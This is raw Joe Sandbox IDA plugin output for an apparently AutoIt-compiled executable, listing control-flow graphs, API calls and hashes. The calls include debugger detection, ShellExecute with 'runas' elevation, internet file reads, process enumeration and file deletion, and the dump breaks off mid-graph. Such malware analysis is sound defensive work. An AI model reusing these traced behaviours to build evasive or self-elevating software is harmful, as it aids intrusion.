75ea0a 99690 75ea36 99695->99441 99696->99689 99698->99690 99778->99180 99780 754f4b CallUnexpected 99779->99780 99781 754f64 99780->99781 99782 754f52 99780->99782 99803 7632d1 EnterCriticalSection 99781->99803 99818 755099 GetModuleHandleW 99782->99818 99785 754f57 99785->99781 99819 7550dd GetModuleHandleExW 99785->99819 99786 755009 99807 755049 99786->99807 99790 754fe0 99795 754ff8 99790->99795 99800 762791 _abort 5 API calls 99790->99800 99792 754f6b 99792->99786 99792->99790 99804 762518 99792->99804 99793 755026 99810 755058 99793->99810 99794 755052 99827 7720a9 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 99794->99827 99796 762791 _abort 5 API calls 99795->99796 99796->99786 99800->99795 99803->99792 99828 762251 99804->99828 99847 763319 LeaveCriticalSection 99807->99847 99809 755022 99809->99793 99809->99794 99848 76397f 99810->99848 99813 755086 99816 7550dd _abort 8 API calls 99813->99816 99814 755066 GetPEB 99814->99813 99815 755076 GetCurrentProcess TerminateProcess 99814->99815 99815->99813 99817 75508e ExitProcess 99816->99817 99818->99785 99820 755107 GetProcAddress 99819->99820 99821 75512a 99819->99821 99824 75511c 99820->99824 99822 755130 FreeLibrary 99821->99822 99823 755139 99821->99823 99822->99823 99825 750dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 99823->99825 99824->99821 99826 754f63 99825->99826 99826->99781 99831 762200 99828->99831 99830 762275 99830->99790 99832 76220c ___BuildCatchObject 99831->99832 99839 7632d1 EnterCriticalSection 99832->99839 99834 76221a 99840 7622a1 99834->99840 99838 762238 __fread_nolock 99838->99830 99839->99834 99841 7622c1 99840->99841 99844 7622c9 99840->99844 99842 750dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 99841->99842 99843 762227 99842->99843 99846 762245 LeaveCriticalSection _abort 99843->99846 99844->99841 99845 762d38 _free 20 API calls 99844->99845 99845->99841 99846->99838 99847->99809 99849 7639a4 99848->99849 99850 76399a 99848->99850 99855 76334a 5 API calls 2 library calls 99849->99855 99852 750dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 99850->99852 99853 755062 99852->99853 99853->99813 99853->99814 99854 7639bb 99854->99850 99855->99854

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 261 735fc8-736037 call 73bf73 GetVersionExW call 738577 266 77507d-775090 261->266 267 73603d 261->267 269 775091-775095 266->269 268 73603f-736041 267->268 270 736047-7360a6 call 73adf4 call 7355dc 268->270 271 7750bc 268->271 272 775097 269->272 273 775098-7750a4 269->273 285 775224-77522b 270->285 286 7360ac-7360ae 270->286 276 7750c3-7750cf 271->276 272->273 273->269 275 7750a6-7750a8 273->275 275->268 278 7750ae-7750b5 275->278 279 73611c-736136 GetCurrentProcess IsWow64Process 276->279 278->266 281 7750b7 278->281 283 736195-73619b 279->283 284 736138 279->284 281->271 287 73613e-73614a 283->287 284->287 290 77522d 285->290 291 77524b-77524e 285->291 288 775125-775138 286->288 289 7360b4-7360b7 286->289 292 736150-73615f LoadLibraryA 287->292 293 775269-77526d GetSystemInfo 287->293 297 775161-775163 288->297 298 77513a-775143 288->298 289->279 299 7360b9-7360f5 289->299 296 775233 290->296 300 775250-77525f 291->300 301 775239-775241 291->301 294 736161-73616f GetProcAddress 292->294 295 73619d-7361a7 GetSystemInfo 292->295 294->295 302 736171-736175 GetNativeSystemInfo 294->302 303 736177-736179 295->303 296->301 307 775165-77517a 297->307 308 775198-77519b 297->308 304 775145-77514b 298->304 305 775150-77515c 298->305 299->279 306 7360f7-7360fa 299->306 300->296 309 775261-775267 300->309 301->291 302->303 312 736182-736194 303->312 313 73617b-73617c FreeLibrary 303->313 304->279 305->279 314 7750d4-7750e4 306->314 315 736100-73610a 306->315 316 775187-775193 307->316 317 77517c-775182 307->317 310 7751d6-7751d9 308->310 311 77519d-7751b8 308->311 309->301 310->279 322 7751df-775206 310->322 318 7751c5-7751d1 311->318 319 7751ba-7751c0 311->319 313->312 320 7750f7-775101 314->320 321 7750e6-7750f2 314->321 315->276 323 736110-736116 315->323 316->279 317->279 318->279 319->279 324 775114-775120 320->324 325 775103-77510f 320->325 321->279 326 775213-77521f 322->326 327 775208-77520e 322->327 323->279 324->279 325->279 326->279 327->279
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00735FF7
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,007CDC2C,00000000,?,?), ref: 00736123
                                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 0073612A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00736155
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00736167
                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00736175
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0073617C
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 007361A1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                                          • Opcode ID: e1509680d4240b74e1cbd47946a471d7958a14d7187ae3e87a692669a73982bc
                                                                                                                                                                                          • Instruction ID: a804d6e95f804ae339018cc7ed466204be79d6d60972a2d00a5ade80992f38ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1509680d4240b74e1cbd47946a471d7958a14d7187ae3e87a692669a73982bc
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0A1C46180A2C8DFDB96CB787C4D5A67F957B26340F2A889DD48493333D2ED4948CB35
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00733368,?), ref: 007333BB
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00733368,?), ref: 007333CE
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00802418,00802400,?,?,?,?,?,?,00733368,?), ref: 0073343A
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                            • Part of subcall function 0073425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00733462,00802418,?,?,?,?,?,?,?,00733368,?), ref: 007342A0
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00802418,?,?,?,?,?,?,?,00733368,?), ref: 007334BB
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00773CB0
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00802418,?,?,?,?,?,?,?,00733368,?), ref: 00773CF1
                                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007F31F4,00802418,?,?,?,?,?,?,?,00733368), ref: 00773D7A
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00773D81
                                                                                                                                                                                            • Part of subcall function 007334D3: GetSysColorBrush.USER32(0000000F), ref: 007334DE
                                                                                                                                                                                            • Part of subcall function 007334D3: LoadCursorW.USER32(00000000,00007F00), ref: 007334ED
                                                                                                                                                                                            • Part of subcall function 007334D3: LoadIconW.USER32(00000063), ref: 00733503
                                                                                                                                                                                            • Part of subcall function 007334D3: LoadIconW.USER32(000000A4), ref: 00733515
                                                                                                                                                                                            • Part of subcall function 007334D3: LoadIconW.USER32(000000A2), ref: 00733527
                                                                                                                                                                                            • Part of subcall function 007334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0073353F
                                                                                                                                                                                            • Part of subcall function 007334D3: RegisterClassExW.USER32(?), ref: 00733590
                                                                                                                                                                                            • Part of subcall function 007335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007335E1
                                                                                                                                                                                            • Part of subcall function 007335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733602
                                                                                                                                                                                            • Part of subcall function 007335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 00733616
                                                                                                                                                                                            • Part of subcall function 007335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 0073361F
                                                                                                                                                                                            • Part of subcall function 0073396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00733A3C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • runas, xrefs: 00773D75
                                                                                                                                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00773CAA
                                                                                                                                                                                          • AutoIt, xrefs: 00773CA5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                          • API String ID: 683915450-2030392706
                                                                                                                                                                                          • Opcode ID: bc32dd8e482f6762a8888e5db2c689d77ad2b5e6c361f34aedbb50662e0fac0f
                                                                                                                                                                                          • Instruction ID: 5c1d3a794c3616304db43907940bf25e19f499f97bc6aa8aaa221e83296810ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc32dd8e482f6762a8888e5db2c689d77ad2b5e6c361f34aedbb50662e0fac0f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9151F771208385EAEB25EF609C49D7A7BA8FF84740F00442CF595922A3DB7C9A49D726
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
                                                                                                                                                                                            • Part of subcall function 0079EAB0: GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0079DCCB
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0079DD1B
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0079DD2C
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0079DD43
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0079DD4C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                                          • Opcode ID: ac394da9ba1b637a7b0d07641a4eb4e7b43b2f05c65b39fbb02d1ea2dc0f2d4d
                                                                                                                                                                                          • Instruction ID: 95aee94732a36105974bd4fc3f08770968aa41f60c1748c96caedf874c515373
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac394da9ba1b637a7b0d07641a4eb4e7b43b2f05c65b39fbb02d1ea2dc0f2d4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77318E31008385EFD710EB64D8998AFB7E8BE96300F404D6DF5D582192EB28DE09CB67
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 944 7ad95f-7ad988 InternetQueryDataAvailable 945 7ad98a-7ad98f 944->945 946 7ad992-7ad995 944->946 945->946 947 7ad9ea-7ad9f0 946->947 948 7ad997-7ad999 946->948 949 7ada29-7ada34 947->949 950 7ad9f2 947->950 951 7ad99b-7ad99d 948->951 952 7ad99f-7ad9aa call 75017b 948->952 956 7ada3d 949->956 957 7ada36-7ada37 SetEvent 949->957 953 7ad9f9-7ada0a GetLastError 950->953 954 7ad9ab-7ad9bc InternetReadFile 951->954 952->954 958 7ada0c-7ada0d SetEvent 953->958 959 7ada13-7ada15 953->959 961 7ad9be-7ad9c1 954->961 962 7ada17-7ada27 call 75013d 954->962 963 7ada3f-7ada43 956->963 957->956 958->959 959->963 965 7ad9c3-7ad9da call 7adcc3 961->965 966 7ad9e1-7ad9e9 call 75013d 961->966 962->953 965->947 972 7ad9dc-7ad9df 965->972 966->947 972->948
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 007AD97D
                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 007AD9B4
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,007ACC63,00000000), ref: 007AD9F9
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,007ACC63,00000000), ref: 007ADA0D
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,007ACC63,00000000), ref: 007ADA37
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                                          • Opcode ID: c2afbc8f2648169384705760765126a5a4e6df5db1e64c077dab312f95376cda
                                                                                                                                                                                          • Instruction ID: 91e5ff47c6cdc246c6fc5c936e66a1c352071f30ebaf66de1e875f825fdbfd51
                                                                                                                                                                                          • Opcode Fuzzy Hash: c2afbc8f2648169384705760765126a5a4e6df5db1e64c077dab312f95376cda
                                                                                                                                                                                          • Instruction Fuzzy Hash: 10316971504608EFDB30DFA5D888EAFBBF8EB85350B10852EF546D2550DB78EE419B60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0079DDAC
                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0079DDBA
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0079DDDA
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0079DE87
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3243318325-0
                                                                                                                                                                                          • Opcode ID: 5af6890bb66df4d07cd8e8109b6cd09b3708499338c16d6e290c314ecb97f020
                                                                                                                                                                                          • Instruction ID: 898fbb06dd96438fa2438f4bb2900042311697a325f14761f8925aa5a05866b4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af6890bb66df4d07cd8e8109b6cd09b3708499338c16d6e290c314ecb97f020
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51317171108301DFD721EF60D889AAFBBE8AF99350F44092DF681871A2DB759D45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,007746AC), ref: 0079E482
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0079E491
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0079E4A2
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0079E4AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                                          • Opcode ID: fd90b5a8c6b5f4f557bc75c2fc347687138934d77a8f7f70d4cc48d50e98cb74
                                                                                                                                                                                          • Instruction ID: 8c4d57b45480445f046f51710547fd7002a9b74ded41ae826464e5f5d646ef34
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd90b5a8c6b5f4f557bc75c2fc347687138934d77a8f7f70d4cc48d50e98cb74
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FF0A030410910679620A7B8BC0D8AE776DBE02335B548719F8B6C20F0DB7CAD958699
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002,00000000), ref: 00755079
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002,00000000), ref: 00755080
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00755092
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                          • Opcode ID: 8efe058e81d04b4452bcb7976794003ae263ab57fa84e8870c32b39054a82eab
                                                                                                                                                                                          • Instruction ID: 3a5d2d643381c2b34cdd360823a955342043bc5f5700fc2031917a4bc949d6ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8efe058e81d04b4452bcb7976794003ae263ab57fa84e8870c32b39054a82eab
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E0B631000A48EFDF216F64DD1DE983B6AEB54386F158028FC499A561DB7DED46CAC4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 74ac3e-74b063 call 738ec0 call 74bc58 call 73e6a0 7 788584-788591 0->7 8 74b069-74b073 0->8 11 788593 7->11 12 788596-7885a5 7->12 9 78896b-788979 8->9 10 74b079-74b07e 8->10 13 78897b 9->13 14 78897e 9->14 15 74b084-74b090 call 74b5b6 10->15 16 7885b2-7885b4 10->16 11->12 17 7885aa 12->17 18 7885a7 12->18 13->14 19 788985-78898e 14->19 23 7885bd 15->23 25 74b096-74b0a3 call 73c98d 15->25 16->23 17->16 18->17 21 788990 19->21 22 788993 19->22 21->22 27 78899c-7889eb call 73e6a0 call 74bbbe * 2 22->27 26 7885c7 23->26 33 74b0ab-74b0b4 25->33 31 7885cf-7885d2 26->31 65 74b1e0-74b1f5 27->65 66 7889f1-788a03 call 74b5b6 27->66 34 7885d8-788600 call 754cd3 call 737ad5 31->34 35 74b158-74b16f 31->35 37 74b0b8-74b0d6 call 754d98 33->37 78 78862d-788651 call 737b1a call 73bd98 34->78 79 788602-788606 34->79 40 74b175 35->40 41 788954-788957 35->41 50 74b0e5 37->50 51 74b0d8-74b0e1 37->51 46 7888ff-788920 call 73e6a0 40->46 47 74b17b-74b17e 40->47 48 78895d-788960 41->48 49 788a41-788a79 call 73e6a0 call 74bbbe 41->49 46->65 71 788926-788938 call 74b5b6 46->71 56 74b184-74b187 47->56 57 788729-788743 call 74bbbe 47->57 48->27 58 788962-788965 48->58 49->65 103 788a7f-788a91 call 74b5b6 49->103 50->26 61 74b0eb-74b0fc 50->61 51->37 59 74b0e3 51->59 67 7886ca-7886e0 call 736c03 56->67 68 74b18d-74b190 56->68 87 788749-78874c 57->87 88 78888f-7888b5 call 73e6a0 57->88 58->9 58->65 59->61 61->9 72 74b102-74b11c 61->72 73 788ac9-788acf 65->73 74 74b1fb-74b20b call 73e6a0 65->74 94 788a2f-788a3c call 73c98d 66->94 95 788a05-788a0d 66->95 67->65 106 7886e6-7886fc call 74b5b6 67->106 69 74b196-74b1b8 call 73e6a0 68->69 70 788656-788659 68->70 69->65 111 74b1ba-74b1cc call 74b5b6 69->111 70->9 85 78865f-788674 call 736c03 70->85 114 78893a-788943 call 73c98d 71->114 115 788945 71->115 72->31 84 74b122-74b154 call 74bbbe call 73e6a0 72->84 73->33 90 788ad5 73->90 78->70 79->78 92 788608-78862b call 73ad40 79->92 84->35 85->65 131 78867a-788690 call 74b5b6 85->131 101 78874e-788751 87->101 102 7887bf-7887de call 73e6a0 87->102 88->65 134 7888bb-7888cd call 74b5b6 88->134 90->9 92->78 92->79 145 788ac2-788ac4 94->145 109 788a1e-788a29 call 73b4b1 95->109 110 788a0f-788a13 95->110 117 788ada-788ae8 101->117 118 788757-788774 call 73e6a0 101->118 102->65 153 7887e4-7887f6 call 74b5b6 102->153 149 788a93-788a9b 103->149 150 788ab5-788abe call 73c98d 103->150 154 78870d-788716 call 738ec0 106->154 155 7886fe-78870b call 738ec0 106->155 109->94 158 788b0b-788b19 109->158 110->109 124 788a15-788a19 110->124 159 7886ba-7886c3 call 73c98d 111->159 160 74b1d2-74b1de 111->160 130 788949-78894f 114->130 115->130 137 788aea 117->137 138 788aed-788afd 117->138 118->65 162 78877a-78878c call 74b5b6 118->162 142 788aa1-788aa3 124->142 130->65 173 78869d-7886ab call 738ec0 131->173 174 788692-78869b call 73c98d 131->174 178 7888de 134->178 179 7888cf-7888dc call 73c98d 134->179 137->138 140 788aff 138->140 141 788b02-788b06 138->141 140->141 141->74 142->65 145->65 163 788aa8-788ab3 call 73b4b1 149->163 164 788a9d 149->164 150->145 153->65 181 7887fc-788805 call 74b5b6 153->181 182 788719-788724 call 738577 154->182 155->182 170 788b1b 158->170 171 788b1e-788b21 158->171 159->67 160->65 194 78878e-78879d call 73c98d 162->194 195 78879f 162->195 163->150 163->158 164->142 170->171 171->19 201 7886ae-7886b5 173->201 174->201 189 7888e2-7888e9 178->189 179->189 207 788818 181->207 208 788807-788816 call 73c98d 181->208 182->65 197 7888eb-7888f0 call 73396b 189->197 198 7888f5 call 733907 189->198 203 7887a3-7887ae call 759334 194->203 195->203 197->65 206 7888fa 198->206 201->65 203->9 218 7887b4-7887ba 203->218 206->65 213 78881c-78883f 207->213 208->213 216 78884d-788850 213->216 217 788841-788848 213->217 219 